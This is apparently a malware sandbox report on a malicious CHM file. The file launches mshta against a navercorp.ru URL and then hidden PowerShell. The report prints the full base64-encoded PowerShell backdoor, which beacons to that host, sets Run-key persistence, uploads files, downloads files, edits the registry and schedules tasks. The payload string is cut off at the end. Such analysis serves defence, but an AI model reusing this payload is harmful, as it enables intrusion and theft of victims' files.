Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 4, 2023, 10:27 a.m.	Sept. 4, 2023, 10:29 a.m.

Size	12.6KB
Type	MS Windows HtmlHelp Data
MD5	`9e6a2914a35256dd450db549fb975f45`
SHA256	`b31b89e646de6e9c5cbe21798e0157fef4d8e612d181085377348c974540760a`
CRC32	`B4756C7D`
ssdeep	`192:JrqjZQWdxljcR5rBrJV6yoDIDnFzL6sZgn1:JrWndfIR5rBrJ04hLI1`
Yara	chm_file_format - chm file format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "YOJrRVJtLJap" C:\Users\test22\AppData\Local\Temp\Fukushima.chm
2556
- hh.exe "C:\Windows\hh.exe" C:\Users\test22\AppData\Local\Temp\Fukushima.chm
  2668
  - mshta.exe "C:\Windows\System32\mshta.exe" http://navercorp.ru/dashboard/image/202302/4.html ,
    2880
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ep bypass -ec UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA4ADsAJABWAHMAVgBtAGEARABqACAAPQAgADEAMAAyADQAIAAqACAAMQAwADIANAA7ACQAeAB3AGIAcAB5AG0AZABVAFcATgBzACAAPQAgACQAZQBuAHYAOgBDAE8ATQBQAFUAVABFAFIATgBBAE0ARQAgACsAIAAnAC0AJwAgACsAIAAkAGUAbgB2ADoAVQBTAEUAUgBOAEEATQBFADsAJABIAFoAZwBxAGYAQgBLAFgAIAA9ACAAJwBoAHQAdABwADoALwAvAG4AYQB2AGUAcgBjAG8AcgBwAC4AcgB1AC8AZABhAHMAaABiAG8AYQByAGQALwBpAG0AYQBnAGUALwAyADAAMgAzADAAMgAvAGMAbwBtAC4AcABoAHAAJwAgACsAIAAnAD8AVQA9ACcAIAArACAAJAB4AHcAYgBwAHkAbQBkAFUAVwBOAHMAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQAgAD0AIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAagBYAFMAaABBAGUAZwBNAEUAVwBNAHcAJwA7AGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAKQApACAAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAtAE4AYQBtAGUAIABmAEcAWgB0AE0AIAAtAFYAYQBsAHUAZQAgACcAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABQAG8AdwBlAHIAUwBoAGUAbABsAC4AZQB4AGUAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBOAG8ATABvAGcAbwAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlACAALQBlAHAAIABiAHkAcABhAHMAcwAgAHAAaQBuAGcAIAAtAG4AIAAxACAALQB3ACAAMwA5ADEANwA2ADMAIAAyAC4AMgAuADIALgAyACAAfAB8ACAAbQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwBuAGEAdgBlAHIAYwBvAHIAcAAuAHIAdQAvAGQAYQBzAGgAYgBvAGEAcgBkAC8AaQBtAGEAZwBlAC8AMgAwADIAMwAwADIALwA0AC4AaAB0AG0AbAAnACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUAOwB9AGYAdQBuAGMAdABpAG8AbgAgAFgAYQBOAHMAWQBKAGIAWABqAFQAbgAoACQAQwB6AHIASAAsACAAJABqAGQAVwBWACkAewAkAEkASgBiAE4AZwBwAFIAZwBVAEwARQBUAEQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAagBkAFcAVgApADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcQB1AGUAcwB0AF0AIAAkAFYAZgB0AFkAWgBIACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAEMAegByAEgAKQA7ACQAVgBmAHQAWQBaAEgALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwA7ACQAVgBmAHQAWQBaAEgALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAJwBhAHAAcABsAGkAYwBhAHQAaQBvAG4ALwB4AC0AdwB3AHcALQBmAG8AcgBtAC0AdQByAGwAZQBuAGMAbwBkAGUAZAAnADsAJABWAGYAdABZAFoASAAuAEMAbwBuAHQAZQBuAHQATABlAG4AZwB0AGgAIAA9ACAAJABJAEoAYgBOAGcAcABSAGcAVQBMAEUAVABEAC4ATABlAG4AZwB0AGgAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVACAAPQAgACQAVgBmAHQAWQBaAEgALgBHAGUAdABSAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtACgAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQB0AGUAKAAkAEkASgBiAE4AZwBwAFIAZwBVAEwARQBUAEQALAAgADAALAAgACQASQBKAGIATgBnAHAAUgBnAFUATABFAFQARAAuAEwAZQBuAGcAdABoACkAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVAC4ARgBsAHUAcwBoACgAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBDAGwAbwBzAGUAKAApADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcwBwAG8AbgBzAGUAXQAgACQAUgBLAGMAbAAgAD0AIAAkAFYAZgB0AFkAWgBIAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQARAB5AGMARAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQAUgBLAGMAbAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUATABUACAAPQAgACQARAB5AGMARAAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AHIAZQB0AHUAcgBuACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQBMAFQAOwB9AGYAdQBuAGMAdABpAG8AbgAgAEQAagBVAHUAaQAoACQAQwB6AHIASAAsACAAJAB2AFAARQBhAHYAUgBPAGoAdgBuACwAIAAkAHQAdQBwACwAIAAkAGIAQgBxAGwAVgApAHsAJABUAGkAbQBlAG8AdQB0AD0AMQAwADAAMAAwADAAMAAwADsAJABDAFIATABGACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADAARAApACAAKwAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADAAQQApADsAJABUAHcAbwBIAHkAcABoAGUAbgBzACAAPQAgACcALQAtACcAOwAkAEIAbwB1AG4AZABhAHIAeQAgAD0AIAAnACoAKgAqACoAKgAnADsAJABzAHQAcgBlAGEAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBPAHAAZQBuAFIAZQBhAGQAKAAkAHYAUABFAGEAdgBSAE8AagB2AG4AKQA7ACQATAByAEIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACAAJABWAHMAVgBtAGEARABqADsAdwBoAGkAbABlACgAIAAkAGIAeQB0AGUAcwBSAGUAYQBkACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABMAHIAQgAsADAALAAkAFYAcwBWAG0AYQBEAGoAKQApAHsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcQB1AGUAcwB0AF0AIAAkAFYAZgB0AFkAWgBIACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAEMAegByAEgAKQA7ACQAVgBmAHQAWQBaAEgALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwA7ACQAVgBmAHQAWQBaAEgALgBUAGkAbQBlAG8AdQB0ACAAPQAgACQAVABpAG0AZQBvAHUAdAA7ACQAVgBmAHQAWQBaAEgALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAJwBtAHUAbAB0AGkAcABhAHIAdAAvAGYAbwByAG0ALQBkAGEAdABhADsAYgBvAHUAbgBkAGEAcgB5AD0AJwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUAIAA9ACAAJABWAGYAdABZAFoASAAuAEcAZQB0AFIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AKAApADsAJABoAGUAYQBkAGkAbgBnADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMQAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADEALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAQwBvAG4AdABlAG4AdAAtAEQAaQBzAHAAbwBzAGkAdABpAG8AbgA6ACAAZgBvAHIAbQAtAGQAYQB0AGEAOwAgAG4AYQBtAGUAPQAnACAAKwAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADIAMgApACAAKwAgACQAdAB1AHAAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJwA7AGYAaQBsAGUAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJABiAEIAcQBsAFYAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJABDAFIATABGACkAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADIALAAgADAALAAgACQAaABlAGEAZABpAG4AZwAyAC4ATABlAG4AZwB0AGgAKQA7ACQAaABlAGEAZABpAG4AZwAzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAEMAUgBMAEYAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQAuAFcAcgBpAHQAZQAoACQATAByAEIALAAgADAALAAgACQAYgB5AHQAZQBzAFIAZQBhAGQAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAFQAdwBvAEgAeQBwAGgAZQBuAHMAIAArACAAJABDAFIATABGACkAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADQALAAgADAALAAgACQAaABlAGEAZABpAG4AZwA0AC4ATABlAG4AZwB0AGgAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBGAGwAdQBzAGgAKAApADsAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQAuAEMAbABvAHMAZQAoACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBzAHAAbwBuAHMAZQBdACAAJABSAEsAYwBsACAAPQAgACQAVgBmAHQAWQBaAEgALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABEAHkAYwBEACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAJABSAEsAYwBsAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQApADsAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQBMAFQAIAA9ACAAJABEAHkAYwBEAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAkAHMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQA7AH0AZgB1AG4AYwB0AGkAbwBuACAARABNAEUASABzAFEASwBWAFUAaAAoACQAQwB6AHIASAAsACAAJAB2AFAARQBhAHYAUgBPAGoAdgBuACkAewBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAUgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJABDAHoAcgBIACkAOwAkAFIAZQBxAHUAZQBzAHQALgBzAGUAdABfAFQAaQBtAGUAbwB1AHQAKAAxADUAMAAwADAAKQA7ACQAUgBlAHMAcABvAG4AcwBlACAAPQAgACQAUgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkAOwAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAgAD0AIAAkAFIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAOwAkAFMAcABsAGkAdABTAGkAegBlACAAPQAgADEAMAAyADQAOwAkAEIAdQBmAGYAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAEIAeQB0AGUAWwBdACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACQAUwBwAGwAaQB0AFMAaQB6AGUAOwBUAHIAeQAgAHsARABvACAAewAkAEMAbwB1AG4AdAAgAD0AIAAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAEIAdQBmAGYAZQByACwAIAAwACwAIAAkAFMAcABsAGkAdABTAGkAegBlACkAOwAkAG8AZgBmAHMAZQB0ACAAPQAgACQAQwBvAHUAbgB0ACAALQAgADEAOwBBAGQAZAAtAEMAbwBuAHQAZQBuAHQAIAAkAHYAUABFAGEAdgBSAE8AagB2AG4AIAAkAEIAdQBmAGYAZQByAFsAMAAuAC4AJABvAGYAZgBzAGUAdABdACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlADsAfQAgAFUAbgB0AGkAbAAoACQAQwBvAHUAbgB0ACAALQBlAHEAIAAwACkAfQAgAEMAYQB0AGMAaAAgAHsAfQAgAEYAaQBuAGEAbABsAHkAIAB7ACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtAC4ARABpAHMAcABvAHMAZQAoACkAOwB9AH0AZABvAHsAVAByAHkAewAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDACAAPQAgAFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJwAnADsASQBmACAAKAAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDACAALQBuAGUAIAAnAG4AdQBsAGwAJwAgAC0AYQBuAGQAIAAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDACAALQBuAGUAIAAnACcAKQB7ACQAZQBWAGoAVgBPAEcASQBLAE0ARABVAEMAPQAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAAxACwAIAAkAGUAVgBqAFYATwBHAEkASwBNAEQAVQBDAC4ATABlAG4AZwB0AGgAIAAtACAAMgApADsAJABjAGkAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAFYAagBWAE8ARwBJAEsATQBEAFUAQwApACkAOwBpAGYAIAAoACQAYwBpAGUAKQB7AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAZgBpAGwAZQBpAG4AZgBvADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADkAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAIAArACAAJwAuAGMAcwB2ACcAOwBHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAJABNAGUAagBYAEMAIAAtAEYAaQBsAHQAZQByACAAKgAuACoAIAAtAFIAZQBjAHUAcgBzAGUAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAE4AYQBtAGUALAAgAEwAZQBuAGcAdABoACwAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACwAIABGAHUAbABsAG4AYQBtAGUAIAB8ACAARQB4AHAAbwByAHQALQBDAHMAdgAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQBuAGEAbQBlACAALQBGAG8AcgBjAGUAIAAtAE4AbwBUAHkAcABlAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAgAC0ARQBuAGMAbwBkAGkAbgBnACAAdQB0AGYAOAA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAA9ACAAJwBfAGYAaQBsAGUAJwA7ACQAbgBvAHcAdABpAG0AZQAgAD0AIABHAGUAdAAtAEQAYQB0AGUAIAAtAEYAbwByAG0AYQB0ACAAeQB5AHkAeQAtAE0ATQAtAGQAZABfAEgASABfAG0AbQBfAHMAcwA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAG4AbwB3AHQAaQBtAGUAIAArACAAJwBfAGYAaQBsAGUAaQBuAGYAbwAnADsARABqAFUAdQBpACAAJABIAFoAZwBxAGYAQgBLAFgAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQAYwBpAGUALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAaQByADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADQAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAIAArACAAJwAuAHoAaQBwACcAOwBDAG8AbQBwAHIAZQBzAHMALQBBAHIAYwBoAGkAdgBlACAAJABNAGUAagBYAEMAIAAkAGYAaQBsAGUAbgBhAG0AZQAgAC0ARgBvAHIAYwBlADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZABpAHIAJwA7AEQAagBVAHUAaQAgACQASABaAGcAcQBmAEIASwBYACAAJABmAGkAbABlAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBuAGEAbQBlACAAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAGMAaQBlAC4AQwBvAG4AdABhAGkAbgBzACgAJwBmAGkAbABlADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZgBpAGwAZQAnADsARABqAFUAdQBpACAAJABIAFoAZwBxAGYAQgBLAFgAIAAkAE0AZQBqAFgAQwAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAGMAaQBlAC4AQwBvAG4AdABhAGkAbgBzACgAJwBkAG8AdwBuADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQATQBlAGoAWABDAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AEQATQBFAEgAcwBRAEsAVgBVAGgAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQA7ACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmADsAfQB9AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAGcAZQBkAGkAdAA6ACcAKQApAHsAJABNAGUAagBYAEMAPQAkAGMAaQBlAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA4ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAE0AZQBqAFgAQwAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAA1ACkAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgAC0ATgBhAG0AZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AIAAtAFYAYQBsAHUAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwA0AF0AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQA7ACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmADsAfQB9AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAdABhAHMAawA6ACcAKQApAHsAJABNAGUAagBYAEMAPQAkAGMAaQBlAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA1ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAE0AZQBqAFgAQwAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAA1ACkAewAkAEEAYwB0AGkAbwBuACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwA0AF0AOwAkAFMAZQB0AHQAaQBuAGcAcwAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ADsAJAB0AHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBPAG4AYwBlACAALQBBAHQAIAAoAEcAZQB0AC0ARABhAHQAZQApACAALQBSAGUAcABlAHQAaQB0AGkAbwBuAEkAbgB0AGUAcgB2AGEAbAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBNAGkAbgB1AHQAZQBzACAAMQAwACkAOwAkAFQAYQBzAGsAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACQAQQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAFQAcgBpAGcAZwBlAHIAIAAtAFMAZQB0AHQAaQBuAGcAcwAgACQAUwBlAHQAdABpAG4AZwBzADsAUgBlAGcAaQBzA